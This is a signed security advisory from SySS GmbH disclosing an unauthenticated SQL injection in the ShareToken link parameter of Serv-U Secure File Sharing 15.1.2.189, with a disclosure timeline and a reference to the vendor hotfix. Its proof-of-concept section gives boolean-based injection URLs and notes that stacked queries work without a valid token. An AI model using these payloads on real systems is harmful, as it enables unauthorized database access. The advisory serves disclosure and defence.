-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-042 Product: Secure File Sharing Vendor: Serv-U Affected Version(s): Serv-U 15.1.2.189 and below Tested Version(s): Serv-U 15.1.2.189 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Fixed Vendor Notification: 2015-07-23 Solution Date: 2015-11-04 Public Disclosure: 2015-11-09 CVE Reference: Not assigned Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: An SQL Injection vulnerability could be identified in the Serv-U Secure File Sharing application. The Serv-U Secure File Sharing is described as follows [1]: "Secure file sharing lets users send files to and request files from anyone. When deployed in your data center, Serv-U Managed File Transfer Server provides this popular “ad hoc” file transfer service to your end-users on your existing infrastructure, and under the control of your existing security policy." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found an SQL injection vulnerability in the invitation link used by the Secure File Sharing application. The vulnerability can be exploited by unauthenticated users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Assuming a valid file sharing link: https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF The following link with an SQL statement which evaluates to true will show the same content: https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'+AND+'1'='1 While an URL with an SQL statement which evaluates to false will be recognized as invalid: https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'+AND+'1'='2 Using stacked queries, this vulnerability can also be exploited without a valid share token. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to information by Serv-U, a HotFix for the described security issue is available at [2]. Please contact the manufacturer for further information or support. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-07-06: Vulnerability discovered 2015-07-23: Vulnerability reported to vendor 2015-07-30: Reported vulnerabilities again as the vendor did not respond to the first e-mail 2015-08-31: Reported vulnerabilities again as the vendor did not respond to the first e-mails 2015-09-16: Rescheduling of the publication date in agreement with the manufacturer. 2015-11-09: Public release of security advisory on agreed publication date ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Serv-U, Secure File Sharing http://www.serv-u.com/secure-file-sharing [2] Serv-U, HotFix for Secure File Sharing http://downloads.solarwinds.com/solarwinds/Release/HotFix/SU-v15.1.2-HotFix2.zip [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Franz G. Jahn and Philipp Buchegger of the SySS GmbH. E-Mail: franz.jahn (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc Key ID: 0xD06A14DE Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE E-Mail: philipp.buchegger (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Philipp_Buchegger.asc Key ID: 0xBB6747E8 Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJWPMsvAAoJENWmFJbQahTeVK8P/jpDnE2XS8g8qxE/A1xBI93U 0AvQjfglx5Y8bIARkDzMhmgrvWKcrhwMoJj8QJElAAU3OhPYlZHRHcu/I2SyWGks Ad0V5ceK41VucvjF2+XRGqSmZmCwB6y1TY9TE+HrGg/5PBhrX6s1cjiaWDcvw2HV D/iuKjlLP6c6+yE21z/TGKm9b6N2EmahKrCOwQPln4RRyRkh32uw8/U+Wja3ujiI gWtCD0O8eIEsy5UPko8wqqsGB0D9WjUQea6jdTJk5eESu7h1dmKGkLdTivv0Z7s5 +bh/YIg9PNGIUFF+flhPBivQ7vLyyE5xqQ4S+I1LAy+hwKUtkP76f1lNQcgx449E YCZnFBR5jhtEOtVVgF24KG6JksjQ5tNS+sCA7o6MYPAuxOXjLqVB2rgh6DE5cKr6 ydMRhjl94b6Pd352dWQlJt1t4/lfc0hTRd+BXe/DN/tTBnVbnk8qGvtS2ZGe4jcQ omclqaR/VMK6nxsFr6SgvElDrmbYsX9n1q1g6mv9nH/yHC16tx4u9lprVtO8jp+8 NmR0A/UZBBm4o3zDDi6EYi7ByqlvryuOIZDpuqLC64uJbKR35VdCUdN1SDXxLU+B 2u1g9ADtTC6P7b50GDw4X8afTdzOkK7Y5crEceUTtzyp3LGUc5sER2R+G4fg7s4o v+yZ8TtxGhwFIlTWg4mn =hSde -----END PGP SIGNATURE-----